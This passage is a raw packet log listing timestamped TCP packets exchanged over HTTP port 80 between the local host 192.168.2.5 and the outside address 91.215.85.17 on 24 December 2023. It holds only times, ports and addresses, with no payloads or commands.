Dec 24, 2023 10:44:27.042361975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042403936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042440891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042488098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042546988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042592049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042606115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042648077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042665958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042706013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042714119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042757988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042844057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042890072 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042953014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042967081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043000937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043026924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043071032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043131113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043144941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043174982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043193102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043211937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043256044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043270111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043314934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043340921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043386936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043553114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043591022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043591022 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043632984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043637037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043679953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043746948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043790102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043837070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043878078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.043921947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.043966055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044030905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044074059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044090033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044137001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044141054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044183016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044261932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044303894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044359922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044401884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044423103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044461966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044519901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044560909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044625044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044667006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044759035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044775009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044805050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044816971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044857979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044883966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044931889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.044953108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.044997931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045022964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045068026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045223951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045263052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045286894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045325994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045337915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045382977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045386076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045429945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045447111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045489073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045552969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045595884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045614004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045655966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045669079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045718908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045726061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045759916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045789003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045835018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045844078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045885086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045900106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045938969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.045941114 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.045981884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046041012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046063900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046087027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046102047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046112061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046149969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046173096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046221018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046230078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046273947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046278954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046322107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046323061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046370029 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046385050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046432018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046438932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046461105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046484947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046497107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046510935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046555042 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046576023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046621084 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046646118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046688080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046753883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046798944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046835899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046879053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046881914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046922922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.046947002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.046989918 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047004938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047044039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047065973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047107935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047174931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047219038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047278881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047292948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047324896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047390938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047435999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047450066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047493935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047502041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047539949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047544003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047569990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047584057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047616959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047620058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047658920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047683001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047725916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047863960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047904968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.047943115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.047986984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048052073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048084974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048098087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048116922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048124075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048156023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048180103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048224926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048345089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048388958 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048448086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048492908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048528910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048572063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048597097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048612118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048644066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048654079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048666000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048708916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048737049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048759937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048779964 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048804045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048804998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048847914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.048871994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.048918962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049083948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049125910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049196005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049240112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049300909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049340010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049393892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049407959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049441099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049501896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049514055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049549103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049609900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049649954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049674034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049717903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049721956 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049760103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049784899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049834967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049838066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049884081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049890041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049932003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.049962044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.049984932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050005913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050007105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050017118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050045967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050066948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050112009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050132990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050178051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050184965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050228119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050240993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050282955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050286055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050328016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050338984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050383091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050396919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050440073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050446987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050489902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050491095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050530910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050554037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050595045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050605059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050647974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050652981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050697088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050720930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050765038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050775051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050817966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050823927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050867081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050889969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050934076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050940037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.050986052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.050988913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051028013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051054001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051095963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051100016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051141024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051157951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051202059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051223993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051266909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051280022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051323891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051331043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051374912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051400900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051449060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051455975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051498890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051512957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051554918 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051558018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051603079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051628113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051670074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051697016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051738977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051774025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051817894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051852942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051894903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051913977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051956892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.051979065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.051992893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052021980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052035093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052079916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052120924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052143097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052162886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052179098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052201033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052243948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052248001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052288055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052308083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052350998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052362919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052400112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052405119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052439928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052602053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052615881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052644968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052656889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052695036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052707911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052738905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052776098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052819967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052824020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052869081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052879095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.052918911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.052992105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053035021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053091049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053103924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053137064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053178072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053214073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053222895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053256035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053260088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053303957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053369999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053416014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053416967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053459883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053484917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053525925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053546906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053591967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053668976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053711891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053749084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053793907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053854942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053896904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.053956032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.053996086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.054020882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.054064035 CET	49716	80	192.168.2.5	91.215.85.17
